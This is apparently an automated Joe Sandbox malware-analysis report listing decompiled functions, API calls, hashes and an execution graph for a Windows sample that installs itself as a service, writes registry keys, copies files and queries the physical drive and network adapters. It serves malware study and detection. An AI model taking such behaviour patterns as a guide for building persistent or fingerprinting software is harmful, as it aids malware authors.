                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$DeleteErrorLastMove
                                                                            • String ID: DeleteFile$MoveFile
                                                                            • API String ID: 3195829115-139070271
                                                                            • Opcode ID: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                            • Instruction ID: 5dbbe8a549c9c9cfc1e93233b16d66570ebc39fdbd933c087ed96991ed48964b
                                                                            • Opcode Fuzzy Hash: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                            • Instruction Fuzzy Hash: 3FF04FA0202200D6DA307A6AD5426DA77888F0135DB50C07BF988AB3C6CABD9C4586AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00421C98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFocus.USER32(00000000,)I,00000000,004219E4,00000000,00000000,00418568,00000000,00000001,?,?,004618B2,00000001,00000000,00000000,00466C49), ref: 00421CBB
                                                                            • GetFocus.USER32 ref: 00421CC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Focus
                                                                            • String ID: )I
                                                                            • API String ID: 2734777837-2943873603
                                                                            • Opcode ID: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                            • Instruction ID: 6a781247274b35bf802f0d5c88fcb4425cf39f3bc7fec05fcedd95d7989a6849
                                                                            • Opcode Fuzzy Hash: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                            • Instruction Fuzzy Hash: ADE09A35B002205ACB1027BA6886BAB21844B64348F58957FB501EB353DD7C8C80068C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                            • GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: `6t
                                                                            • API String ID: 2123368496-1776432738
                                                                            • Opcode ID: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                            • Instruction ID: 6c134d8f911d6f86227fe2926812c1aaae8294de158ab29e80a48ca6d96688b2
                                                                            • Opcode Fuzzy Hash: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                            • Instruction Fuzzy Hash: 00C002609052058AD750AFB5D856F152A949795349F80447FB204B61E1D67C82065BDD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453DDC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                            • Instruction ID: 12fd24ff74408153868fcfa923be8ac64c8e349910a1f425c594e0bb2a7a610d
                                                                            • Opcode Fuzzy Hash: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                            • Instruction Fuzzy Hash: 5CF02B32B04514974F30ADAE98C766FA2DCEA813E7710452BFD08D7303D538DE0986A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:7.4%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:4.7%
                                                                            Total number of Nodes:448
                                                                            Total number of Limit Nodes:13
                                                                            execution_graph 2736 402345 2737 4026a1 StartServiceCtrlDispatcherA 2736->2737 2738 40b5f9 2737->2738 2738->2738 2889 4028c6 2890 402e70 12 API calls 2889->2890 2891 4028cb 2890->2891 2892 402e70 12 API calls 2891->2892 2893 40b467 2892->2893 2893->2893 2809 402748 GetModuleFileNameW 2810 40ba83 2809->2810 2894 4021c9 2895 4021cf 2894->2895 2896 40b6b6 GetModuleHandleA GetModuleFileNameA 2895->2896 2811 40234b 2812 40b15c CreateFileA 2811->2812 2901 4025d6 SetEvent 2902 40babc 2901->2902 2762 4028db RegCloseKey 2763 40286b 2762->2763 2763->2762 2813 40235e 2814 4023b0 2813->2814 2815 402365 2813->2815 2815->2814 2816 402370 GetLastError SetServiceStatus SetEvent 2815->2816 2816->2814 2903 40b4de CreateDirectoryA 2817 40b660 2818 40b673 Sleep 2817->2818 2819 40b93b 2818->2819 2819->2819 2904 404ae0 2905 404ae8 2904->2905 2906 404b7a 2905->2906 2908 4049f0 RtlUnwind 2905->2908 2909 404a08 2908->2909 2909->2905 2820 402561 2822 402566 2820->2822 2821 4028db RegCloseKey 2821->2822 2822->2821 2910 4021e1 2911 4026c0 2910->2911 2912 40220b 2910->2912 2912->2910 2913 40b8d3 LoadLibraryExA 2912->2913 2914 40ba62 2912->2914 2913->2912 2915 4026e2 2916 40b8d3 LoadLibraryExA 2915->2916 2917 4021e1 2916->2917 2917->2916 2918 4026c0 2917->2918 2823 402667 2824 402664 2823->2824 2824->2823 2825 40b681 GetProcAddress 2824->2825 2919 405ce7 2920 405cf5 2919->2920 2921 405cf9 LCMapStringW 2920->2921 2924 405cad 2920->2924 2922 405d11 WideCharToMultiByte 2921->2922 2921->2924 2922->2924 2925 404ae8 2926 404b7a 2925->2926 2928 404b06 2925->2928 2927 4049f0 RtlUnwind 2927->2928 2928->2926 2928->2927 2740 40b3ea 2741 40b577 RegSetValueExA 2740->2741 2826 405e6b 2827 405e72 2826->2827 2828 405ea3 2827->2828 2829 405e7a MultiByteToWideChar 2827->2829 2829->2828 2830 405e93 GetStringTypeW 2829->2830 2830->2828 2932 4024ec 2933 40b5ed WaitForSingleObject 2932->2933 2935 40b6ec Sleep 2831 40b86d ExitProcess 2748 40226e 2749 4022bb 2748->2749 2750 40227b 2748->2750 2751 40b414 lstrcmpiW 2750->2751 2752 402283 2750->2752 2751->2752 2752->2752 2936 40b2ef 2937 40b2f5 VirtualAlloc 2936->2937 2938 40b359 2936->2938 2937->2938 2938->2938 2832 402572 2833 40b000 CreateServiceA 2832->2833 2834 40b69a 2833->2834 2835 402776 GetModuleHandleA 2757 40417b 2758 404187 GetCurrentProcess TerminateProcess 2757->2758 2759 404198 2757->2759 2758->2759 2760 404212 2759->2760 2761 404202 ExitProcess 2759->2761 2802 40b4fc 2803 40b510 2802->2803 2804 40b4d3 CreateDirectoryA 2802->2804 2806 4028fd 2807 40b3c0 RegOpenKeyExA 2806->2807 2808 40b934 2807->2808 2939 4025fd wsprintfA 2940 402741 2939->2940 2836 40217e 2837 402863 GetModuleHandleA 2836->2837 2839 40bb7f 2840 40bba1 RegCloseKey 2839->2840 2841 40bba7 2840->2841 2941 402782 GetTickCount 2743 40b40c 2744 40b4d1 RegQueryValueExA 2743->2744 2745 40b92e 2744->2745 2746 40b822 RegCloseKey 2745->2746 2747 40b934 2745->2747 2746->2745 2942 40b38c CloseServiceHandle 2842 40300d 2849 40416a 2842->2849 2844 403018 2845 403026 2844->2845 2847 404bc0 7 API calls 2844->2847 2846 404bf9 7 API calls 2845->2846 2848 40302f 2846->2848 2847->2845 2850 40417b 3 API calls 2849->2850 2851 404177 2850->2851 2851->2844 2852 40b00d RegCreateKeyExA 2853 40b01b 2852->2853 2753 40b397 2754 40b398 CopyFileA 2753->2754 2756 402661 2754->2756 2756->2756 2421 402f22 GetVersion 2445 40325a HeapCreate 2421->2445 2423 402f81 2424 402f86 2423->2424 2425 402f8e 2423->2425 2520 40303d 2424->2520 2457 404842 2425->2457 2429 402f96 GetCommandLineA 2471 404710 2429->2471 2433 402fb0 2503 40440a 2433->2503 2435 402fb5 2436 402fba GetStartupInfoA 2435->2436 2516 4043b2 2436->2516 2438 402fcc GetModuleHandleA 2440 402ff0 2438->2440 2526 404159 2440->2526 2446 4032b0 2445->2446 2447 40327a 2445->2447 2446->2423 2533 403112 2447->2533 2450 403296 2452 4032b3 2450->2452 2547 403b08 2450->2547 2451 403289 2545 4032b7 HeapAlloc 2451->2545 2452->2423 2455 403293 2455->2452 2456 4032a4 HeapDestroy 2455->2456 2456->2446 2610 402e70 2457->2610 2460 404861 GetStartupInfoA 2467 404972 2460->2467 2470 4048ad 2460->2470 2463 404999 GetStdHandle 2466 4049a7 GetFileType 2463->2466 2463->2467 2464 4049d9 SetHandleCount 2464->2429 2465 402e70 12 API calls 2465->2470 2466->2467 2467->2463 2467->2464 2468 40491e 2468->2467 2469 404940 GetFileType 2468->2469 2469->2468 2470->2465 2470->2467 2470->2468 2472 40472b GetEnvironmentStringsW 2471->2472 2473 40475e 2471->2473 2474 404733 2472->2474 2475 40473f GetEnvironmentStrings 2472->2475 2473->2474 2476 40474f 2473->2476 2478 404777 WideCharToMultiByte 2474->2478 2479 40476b GetEnvironmentStringsW 2474->2479 2475->2476 2477 402fa6 2475->2477 2476->2477 2480 4047f1 GetEnvironmentStrings 2476->2480 2481 4047fd 2476->2481 2494 4044c3 2477->2494 2483 4047ab 2478->2483 2484 4047dd FreeEnvironmentStringsW 2478->2484 2479->2477 2479->2478 2480->2477 2480->2481 2485 402e70 12 API calls 2481->2485 2486 402e70 12 API calls 2483->2486 2484->2477 2492 404818 2485->2492 2487 4047b1 2486->2487 2487->2484 2488 4047ba WideCharToMultiByte 2487->2488 2490 4047d4 2488->2490 2491 4047cb 2488->2491 2489 40482e FreeEnvironmentStringsA 2489->2477 2490->2484 2676 403061 2491->2676 2492->2489 2495 4044d5 2494->2495 2496 4044da GetModuleFileNameA 2494->2496 2706 40583b 2495->2706 2498 4044fd 2496->2498 2499 402e70 12 API calls 2498->2499 2500 40451e 2499->2500 2501 403018 7 API calls 2500->2501 2502 40452e 2500->2502 2501->2502 2502->2433 2504 404417 2503->2504 2506 40441c 2503->2506 2505 40583b 19 API calls 2504->2505 2505->2506 2507 402e70 12 API calls 2506->2507 2508 404449 2507->2508 2509 403018 7 API calls 2508->2509 2512 40445d 2508->2512 2509->2512 2510 403061 7 API calls 2511 4044ac 2510->2511 2511->2435 2513 4044a0 2512->2513 2514 402e70 12 API calls 2512->2514 2515 403018 7 API calls 2512->2515 2513->2510 2514->2512 2515->2512 2517 4043bb 2516->2517 2519 4043c0 2516->2519 2518 40583b 19 API calls 2517->2518 2518->2519 2519->2438 2521 403046 2520->2521 2522 40304b 2520->2522 2523 404bc0 7 API calls 2521->2523 2524 404bf9 7 API calls 2522->2524 2523->2522 2525 403054 ExitProcess 2524->2525 2730 40417b 2526->2730 2529 40422e 2530 40423a 2529->2530 2531 404363 UnhandledExceptionFilter 2530->2531 2532 40300a 2530->2532 2531->2532 2556 402d50 2533->2556 2536 403155 GetEnvironmentVariableA 2538 403232 2536->2538 2539 403174 2536->2539 2537 40313b 2537->2536 2540 40314d 2537->2540 2538->2540 2561 4030e5 GetModuleHandleA 2538->2561 2542 4031b9 GetModuleFileNameA 2539->2542 2543 4031b1 2539->2543 2540->2450 2540->2451 2542->2543 2543->2538 2558 404d4c 2543->2558 2546 4032d3 2545->2546 2546->2455 2548 403b15 2547->2548 2549 403b1c HeapAlloc 2547->2549 2550 403b39 VirtualAlloc 2548->2550 2549->2550 2551 403b71 2549->2551 2552 403b59 VirtualAlloc 2550->2552 2553 403c2e 2550->2553 2551->2455 2552->2551 2554 403c20 VirtualFree 2552->2554 2553->2551 2555 403c36 HeapFree 2553->2555 2554->2553 2555->2551 2557 402d5c GetVersionExA 2556->2557 2557->2536 2557->2537 2563 404d63 2558->2563 2562 4030fc 2561->2562 2562->2540 2565 404d7b 2563->2565 2567 404dab 2565->2567 2570 405aaa 2565->2570 2566 405aaa 6 API calls 2566->2567 2567->2566 2569 404d5f 2567->2569 2574 4059de 2567->2574 2569->2538 2571 405ac8 2570->2571 2573 405abc 2570->2573 2580 405d6e 2571->2580 2573->2565 2575 405a09 2574->2575 2579 4059ec 2574->2579 2576 405a25 2575->2576 2577 405aaa 6 API calls 2575->2577 2576->2579 2592 405b1f 2576->2592 2577->2576 2579->2567 2581 405d9f GetStringTypeW 2580->2581 2583 405db7 2580->2583 2582 405dbb GetStringTypeA 2581->2582 2581->2583 2582->2583 2587 405ea3 2582->2587 2584 405de2 GetStringTypeA 2583->2584 2586 405e06 2583->2586 2584->2587 2586->2587 2588 405e1c MultiByteToWideChar 2586->2588 2587->2573 2588->2587 2589 405e40 2588->2589 2589->2587 2590 405e7a MultiByteToWideChar 2589->2590 2590->2587 2591 405e93 GetStringTypeW 2590->2591 2591->2587 2593 405b4f LCMapStringW 2592->2593 2595 405b6b 2592->2595 2594 405b73 LCMapStringA 2593->2594 2593->2595 2594->2595 2597 405cad 2594->2597 2596 405bb4 LCMapStringA 2595->2596 2598 405bd1 2595->2598 2596->2597 2597->2579 2598->2597 2599 405be7 MultiByteToWideChar 2598->2599 2599->2597 2600 405c11 2599->2600 2600->2597 2601 405c47 MultiByteToWideChar 2600->2601 2601->2597 2602 405c60 LCMapStringW 2601->2602 2602->2597 2603 405c7b 2602->2603 2604 405c81 2603->2604 2606 405cc1 2603->2606 2604->2597 2605 405c8f LCMapStringW 2604->2605 2605->2597 2606->2597 2607 405cf9 LCMapStringW 2606->2607 2607->2597 2608 405d11 WideCharToMultiByte 2607->2608 2608->2597 2619 402e82 2610->2619 2613 403018 2614 403021 2613->2614 2615 403026 2613->2615 2656 404bc0 2614->2656 2662 404bf9 2615->2662 2620 402e7f 2619->2620 2622 402e89 2619->2622 2620->2460 2620->2613 2622->2620 2623 402eae 2622->2623 2624 402ed2 2623->2624 2625 402ebd 2623->2625 2627 402f11 HeapAlloc 2624->2627 2631 402ecb 2624->2631 2638 403e00 2624->2638 2625->2631 2632 403653 2625->2632 2628 402f20 2627->2628 2628->2622 2629 402ed0 2629->2622 2631->2627 2631->2628 2631->2629 2633 403685 2632->2633 2634 403724 2633->2634 2636 403733 2633->2636 2645 40395c 2633->2645 2634->2636 2652 403a0d 2634->2652 2636->2631 2639 403e0e 2638->2639 2640 403fcf 2639->2640 2641 403efa VirtualAlloc 2639->2641 2644 403ecb 2639->2644 2642 403b08 5 API calls 2640->2642 2641->2644 2642->2644 2644->2631 2646 40399f HeapAlloc 2645->2646 2647 40396f HeapReAlloc 2645->2647 2649 4039ef 2646->2649 2650 4039c5 VirtualAlloc 2646->2650 2648 40398e 2647->2648 2647->2649 2648->2646 2649->2634 2650->2649 2651 4039df HeapFree 2650->2651 2651->2649 2653 403a1f VirtualAlloc 2652->2653 2655 403a68 2653->2655 2655->2636 2657 404bca 2656->2657 2658 404bf9 7 API calls 2657->2658 2661 404bf7 2657->2661 2659 404be1 2658->2659 2660 404bf9 7 API calls 2659->2660 2660->2661 2661->2615 2664 404c0c 2662->2664 2663 404d23 2666 404d36 GetStdHandle WriteFile 2663->2666 2664->2663 2665 404c4c 2664->2665 2670 40302f 2664->2670 2667 404c58 GetModuleFileNameA 2665->2667 2665->2670 2666->2670 2668 404c70 2667->2668 2671 405857 2668->2671 2670->2460 2672 405864 LoadLibraryA 2671->2672 2674 4058a6 2671->2674 2673 405875 GetProcAddress 2672->2673 2672->2674 2673->2674 2675 40588c GetProcAddress GetProcAddress 2673->2675 2674->2670 2675->2674 2677 403089 2676->2677 2678 40306d 2676->2678 2677->2490 2679 403077 2678->2679 2680 40308d 2678->2680 2682 4030b9 HeapFree 2679->2682 2683 403083 2679->2683 2681 4030b8 2680->2681 2684 4030a7 2680->2684 2681->2682 2682->2677 2687 40332a 2683->2687 2693 403dbb 2684->2693 2688 403368 2687->2688 2692 40361e 2687->2692 2689 403564 VirtualFree 2688->2689 2688->2692 2690 4035c8 2689->2690 2691 4035d7 VirtualFree HeapFree 2690->2691 2690->2692 2691->2692 2692->2677 2694 403de8 2693->2694 2695 403dfe 2693->2695 2694->2695 2697 403ca2 2694->2697 2695->2677 2700 403caf 2697->2700 2698 403d5f 2698->2695 2699 403cd0 VirtualFree 2699->2700 2700->2698 2700->2699 2702 403c4c VirtualFree 2700->2702 2703 403c69 2702->2703 2704 403c99 2703->2704 2705 403c79 HeapFree 2703->2705 2704->2700 2705->2700 2707 405844 2706->2707 2708 40584b 2706->2708 2710 405477 2707->2710 2708->2496 2717 405610 2710->2717 2712 405604 2712->2708 2715 4054ba GetCPInfo 2716 4054ce 2715->2716 2716->2712 2722 4056b6 GetCPInfo 2716->2722 2718 405630 2717->2718 2719 405620 GetOEMCP 2717->2719 2720 405488 2718->2720 2721 405635 GetACP 2718->2721 2719->2718 2720->2712 2720->2715 2720->2716 2721->2720 2723 4056d9 2722->2723 2729 4057a1 2722->2729 2724 405d6e 6 API calls 2723->2724 2725 405755 2724->2725 2726 405b1f 9 API calls 2725->2726 2727 405779 2726->2727 2728 405b1f 9 API calls 2727->2728 2728->2729 2729->2712 2731 404187 GetCurrentProcess TerminateProcess 2730->2731 2732 404198 2730->2732 2731->2732 2733 402ff9 2732->2733 2734 404202 ExitProcess 2732->2734 2733->2529 2854 402322 2855 402324 Sleep 2854->2855 2857 40b93b 2855->2857 2735 40b323 OpenSCManagerA 2858 402223 2860 40b055 2858->2860 2859 4022ba 2860->2859 2862 401f64 FindResourceA 2860->2862 2863 401f86 GetLastError SizeofResource 2862->2863 2864 401f9f 2862->2864 2863->2864 2865 401fa6 LoadResource LockResource GlobalAlloc 2863->2865 2864->2859 2866 401fd2 2865->2866 2867 401ffb GetTickCount 2866->2867 2869 402005 GlobalAlloc 2867->2869 2869->2864 2739 4028a6 RegCreateKeyExA 2870 40222b 2871 40b4bb GetLastError 2870->2871 2943 4021ae 2944 402514 wsprintfA 2943->2944 2873 405c33 2874 405c42 2873->2874 2875 405c47 MultiByteToWideChar 2874->2875 2876 405cad 2874->2876 2875->2876 2877 405c60 LCMapStringW 2875->2877 2877->2876 2878 405c7b 2877->2878 2879 405c81 2878->2879 2881 405cc1 2878->2881 2879->2876 2880 405c8f LCMapStringW 2879->2880 2880->2876 2881->2876 2882 405cf9 LCMapStringW 2881->2882 2882->2876 2883 405d11 WideCharToMultiByte 2882->2883 2883->2876 2946 4023b3 RegisterServiceCtrlHandlerA 2947 4023d6 2946->2947 2948 4024cc 2946->2948 2949 4023e4 SetServiceStatus GetLastError CreateEventA 2947->2949 2950 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2949->2950 2951 40243e GetLastError 2949->2951 2952 4024c3 SetServiceStatus 2950->2952 2951->2952 2952->2948 2953 4025b8 CloseHandle 2954 40b8a2 ExitProcess 2953->2954 2955 4026ba 2956 40b0d5 RegSetValueExA 2955->2956 2958 40bba1 RegCloseKey 2956->2958 2959 40bba7 2958->2959 2885 40b33b 2886 40b344 CopyFileA 2885->2886 2888 402661 2886->2888 2888->2888 2764 40223c GetCommandLineW 2765 40b040 CommandLineToArgvW 2764->2765 2766 40b942 GetLocalTime 2765->2766 2769 401f27 2766->2769 2770 401f3c 2769->2770 2773 401a1d 2770->2773 2772 401f45 2774 401a2c 2773->2774 2779 401a4f CreateFileA 2774->2779 2778 401a3e 2778->2772 2780 401a35 2779->2780 2786 401a7d 2779->2786 2787 401b4b LoadLibraryA 2780->2787 2781 401a98 DeviceIoControl 2781->2786 2783 401b3a FindCloseChangeNotification 2783->2780 2784 401b0e GetLastError 2784->2783 2784->2786 2786->2781 2786->2783 2786->2784 2796 402cb6 2786->2796 2799 402ca8 2786->2799 2788 401c21 2787->2788 2789 401b6e GetProcAddress 2787->2789 2788->2778 2790 401c18 FreeLibrary 2789->2790 2792 401b85 2789->2792 2790->2788 2791 401b95 GetAdaptersInfo 2791->2792 2792->2791 2793 402cb6 7 API calls 2792->2793 2794 401c15 2792->2794 2795 402ca8 12 API calls 2792->2795 2793->2792 2794->2790 2795->2792 2797 403061 7 API calls 2796->2797 2798 402cbf 2797->2798 2798->2786 2800 402e82 12 API calls 2799->2800 2801 402cb3 2800->2801 2801->2786

                                                                            Executed Functions

                                                                            Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                            • API String ID: 514930453-3667123677
                                                                            • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                            • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402cb6 31->33 38 401b09-401b0c 32->38 39 401b3a-401b44 FindCloseChangeNotification 32->39 33->32 34->31 36 401adb-401af1 call 402cd0 call 4018cc 34->36 35->31 36->31 42 401b27-401b34 call 402ca8 38->42 43 401b0e-401b17 GetLastError 38->43 39->27 42->29 42->39 43->39 46 401b19-401b1c 43->46 46->42 49 401b1e-401b24 46->49 49->42
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                            • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402345 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 159 402345-4026a8 StartServiceCtrlDispatcherA 161 40b5f9 159->161 161->161
                                                                            APIs
                                                                            • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004026A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlDispatcherServiceStart
                                                                            • String ID:
                                                                            • API String ID: 3789849863-0
                                                                            • Opcode ID: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                            • Instruction ID: 40a2f8b49cbd42c4c1ae9a929fb38234da1fb277cd8ec946056b9c6573f4ebba
                                                                            • Opcode Fuzzy Hash: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                            • Instruction Fuzzy Hash: E1A011A020C20AEACA0002808A0C0B2A00CA30A32AB3008B3200FB00C282BC802238AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402F22 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 00402F48
                                                                              • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                              • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                            • String ID: 6i
                                                                            • API String ID: 2057626494-2055133051
                                                                            • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                            • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040417B Relevance: 4.5, APIs: 3, Instructions: 49COMMON
